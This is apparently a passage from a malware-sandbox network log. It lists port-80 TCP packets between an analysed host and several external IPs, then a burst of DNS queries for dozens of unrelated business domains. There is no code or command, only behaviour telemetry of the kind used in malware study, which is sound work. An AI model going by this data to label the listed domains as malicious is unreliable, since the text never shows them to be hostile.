                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.179080963 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.179128885 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.179193974 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.179236889 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.179342985 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.179362059 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.179464102 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.179481030 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.179591894 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.179615021 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.179649115 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.179688931 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.179801941 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.179821014 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.179858923 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.179934025 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.179996014 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.180159092 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.180229902 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.180274963 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.180318117 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.180362940 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.180480003 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.180557966 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.180582047 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.180694103 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.180718899 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.180797100 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.180808067 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.180857897 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.180916071 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.180982113 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.181058884 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.181104898 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.181119919 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.181149960 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.181238890 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.181349039 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.181467056 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.181473017 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.181514025 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.181598902 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.181658030 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.181714058 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.181766987 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.181833982 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.181900978 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.181905985 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.181930065 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.181953907 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.181976080 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.209125996 CET804973299.83.154.118192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.209359884 CET4973280192.168.2.699.83.154.118
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.291264057 CET8049996107.180.98.101192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.291421890 CET4999680192.168.2.6107.180.98.101
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.292274952 CET4999680192.168.2.6107.180.98.101
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.373696089 CET8049862147.154.0.23192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.374264956 CET4986280192.168.2.6147.154.0.23
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.456188917 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.456224918 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.456278086 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.456307888 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.456346989 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.456438065 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.456489086 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.456510067 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.456636906 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.456693888 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.456701040 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.456764936 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.456823111 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.456876040 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.456927061 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.457010984 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.457030058 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.457252026 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.457268953 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.457314014 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.457318068 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.457370043 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.457420111 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.457472086 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.457572937 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.457660913 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.457736969 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.457761049 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.457840919 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.457904100 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.457952023 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.457956076 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.457987070 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.457993031 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.458108902 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.458146095 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.458194017 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.458249092 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.458301067 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.458331108 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.458379030 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.458427906 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.458482027 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.458554029 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.458600998 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.458681107 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.458725929 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.458794117 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.458854914 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.458883047 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.458928108 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.458990097 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.459032059 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.459108114 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.459161043 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.459300041 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.459325075 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.459383965 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.459440947 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.459489107 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.459553003 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.459603071 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.459678888 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.459733963 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.459794044 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.459846020 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.459943056 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.459996939 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.460050106 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.460099936 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.460133076 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.460181952 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.460235119 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.460278034 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.460333109 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.460377932 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.460434914 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.460488081 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.460585117 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.460637093 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.460664988 CET804999562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.460711956 CET4999580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.022608995 CET192.168.2.68.8.8.80x6856Standard query (0)www.baijaku.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.027112961 CET192.168.2.68.8.8.80xad0dStandard query (0)www.pr-park.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.030364037 CET192.168.2.68.8.8.80x7445Standard query (0)www.dgmna.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.033534050 CET192.168.2.68.8.8.80x94e1Standard query (0)www.jenco.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.052817106 CET192.168.2.68.8.8.80xe276Standard query (0)www.quadlock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.057081938 CET192.168.2.68.8.8.80xa0feStandard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.075726986 CET192.168.2.68.8.8.80x2becStandard query (0)www.olras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.075865984 CET192.168.2.68.8.8.80x2751Standard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.076056004 CET192.168.2.68.8.8.80x32bbStandard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.077662945 CET192.168.2.68.8.8.80x7562Standard query (0)www.pdqhomes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.573833942 CET192.168.2.68.8.8.80xd069Standard query (0)www.mqs.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.575979948 CET192.168.2.68.8.8.80x8cfeStandard query (0)www.rs-ag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.577378988 CET192.168.2.68.8.8.80xe42eStandard query (0)www.alteor.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.975652933 CET192.168.2.68.8.8.80xd4fdStandard query (0)www.valdal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:16.101151943 CET192.168.2.68.8.8.80x2d9dStandard query (0)www.item-pr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:16.106944084 CET192.168.2.68.8.8.80xb55cStandard query (0)www.credo.edu.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:16.111129045 CET192.168.2.68.8.8.80x12c1Standard query (0)www.depalo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:16.133270025 CET192.168.2.68.8.8.80x122aStandard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:16.872641087 CET192.168.2.68.8.8.80x974bStandard query (0)www.elpro.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:17.024786949 CET192.168.2.68.8.8.80x3c86Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:17.024863958 CET192.168.2.68.8.8.80xf1e5Standard query (0)www.nunomira.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:17.031112909 CET192.168.2.68.8.8.80x6b18Standard query (0)www.petsfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:17.033587933 CET192.168.2.68.8.8.80x1443Standard query (0)www.otena.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:17.076749086 CET192.168.2.68.8.8.80x409Standard query (0)www.transsib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:17.077090025 CET192.168.2.68.8.8.80x3877Standard query (0)www.tvtools.fiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:17.208302021 CET192.168.2.68.8.8.80x20e1Standard query (0)www.abart.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:18.103725910 CET192.168.2.68.8.8.80xbfa7Standard query (0)www.iamdirt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:18.357496977 CET192.168.2.68.8.8.80xda20Standard query (0)www.naoi-a.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:18.446976900 CET192.168.2.68.8.8.80x7356Standard query (0)www.nelipak.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:18.452635050 CET192.168.2.68.8.8.80x4b9aStandard query (0)www.t-tre.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:18.456965923 CET192.168.2.68.8.8.80xe9f1Standard query (0)www.abdg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:18.604890108 CET192.168.2.68.8.8.80x965aStandard query (0)www.evcpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:18.604949951 CET192.168.2.68.8.8.80x5c95Standard query (0)www.ora.ecnet.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:18.605135918 CET192.168.2.68.8.8.80x5da2Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:19.200113058 CET192.168.2.68.8.8.80x20d6Standard query (0)www.wifi4all.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:19.205144882 CET192.168.2.68.8.8.80x50a1Standard query (0)www.hummer.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:19.542300940 CET192.168.2.68.8.8.80xb5abStandard query (0)www.vexcom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:19.546379089 CET192.168.2.68.8.8.80x95dStandard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:19.548510075 CET192.168.2.68.8.8.80xb849Standard query (0)www.cokocoko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:19.556242943 CET192.168.2.68.8.8.80x9d6dStandard query (0)www.edimart.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:20.132097960 CET192.168.2.68.8.8.80xa7c4Standard query (0)www.xaicom.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:20.150892973 CET192.168.2.68.8.8.80x59Standard query (0)www.fcwcvt.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:20.587066889 CET192.168.2.68.8.8.80xe8bbStandard query (0)www.waldi.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:20.589772940 CET192.168.2.68.8.8.80x5fa0Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:20.590368986 CET192.168.2.68.8.8.80xa89bStandard query (0)www.yocinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:20.590452909 CET192.168.2.68.8.8.80xacc2Standard query (0)www.sjbs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:20.866389990 CET192.168.2.68.8.8.80x27acStandard query (0)www.gpthink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:20.872436047 CET192.168.2.68.8.8.80x74aeStandard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:20.878757000 CET192.168.2.68.8.8.80x5ab6Standard query (0)www.pcgrate.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:20.883879900 CET192.168.2.68.8.8.80x26cStandard query (0)www.aevga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:21.580868006 CET192.168.2.68.8.8.80x8438Standard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:21.584635973 CET192.168.2.68.8.8.80xfd36Standard query (0)www.snugpak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:21.832700968 CET192.168.2.68.8.8.80x1821Standard query (0)www.speelhal.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:21.834014893 CET192.168.2.68.8.8.80xbc22Standard query (0)www.jchysk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:21.870800972 CET192.168.2.68.8.8.80xf227Standard query (0)www.maktraxx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:21.893965960 CET192.168.2.68.8.8.80x9a23Standard query (0)www.vitaindu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:22.217742920 CET192.168.2.68.8.8.80x6c75Standard query (0)www.stnic.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:22.228301048 CET192.168.2.68.8.8.80xcf8fStandard query (0)www.photo4b.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:22.235342026 CET192.168.2.68.8.8.80x1aaaStandard query (0)www.findbc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:23.136455059 CET192.168.2.68.8.8.80x8438Standard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:27.935749054 CET192.168.2.68.8.8.80xc55bStandard query (0)www.fink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.070918083 CET192.168.2.68.8.8.80x422aStandard query (0)www.cel-cpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.115653038 CET192.168.2.68.8.8.80x2870Standard query (0)www.valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.137887955 CET192.168.2.68.8.8.80xa85Standard query (0)www.crcsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.138245106 CET192.168.2.68.8.8.80x600Standard query (0)www.c9dd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.140695095 CET192.168.2.68.8.8.80x65ecStandard query (0)www.netcr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.140908957 CET192.168.2.68.8.8.80x7cbbStandard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.170423031 CET192.168.2.68.8.8.80x7800Standard query (0)www.dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.481261969 CET192.168.2.68.8.8.80x40b6Standard query (0)www.mobilnic.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.581778049 CET192.168.2.68.8.8.80x7a81Standard query (0)www.domon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.611996889 CET192.168.2.68.8.8.80x7e33Standard query (0)www.2print.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.783719063 CET192.168.2.68.8.8.80x7d66Standard query (0)www.stajum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.666244030 CET192.168.2.68.8.8.80x9a9aStandard query (0)www.fe-bauer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.666917086 CET192.168.2.68.8.8.80x653aStandard query (0)www.ora-ito.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.668508053 CET192.168.2.68.8.8.80x40faStandard query (0)www.nqks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.669692039 CET192.168.2.68.8.8.80x9eeaStandard query (0)www.pwd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.670388937 CET192.168.2.68.8.8.80x3ff2Standard query (0)www.x0c.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.779501915 CET192.168.2.68.8.8.80x8030Standard query (0)www.lrsuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.684806108 CET192.168.2.68.8.8.80x75d4Standard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.861289024 CET192.168.2.68.8.8.80x4f20Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.939687014 CET192.168.2.68.8.8.80xd836Standard query (0)www.myropcb.comA (IP address)IN (0x0001)false
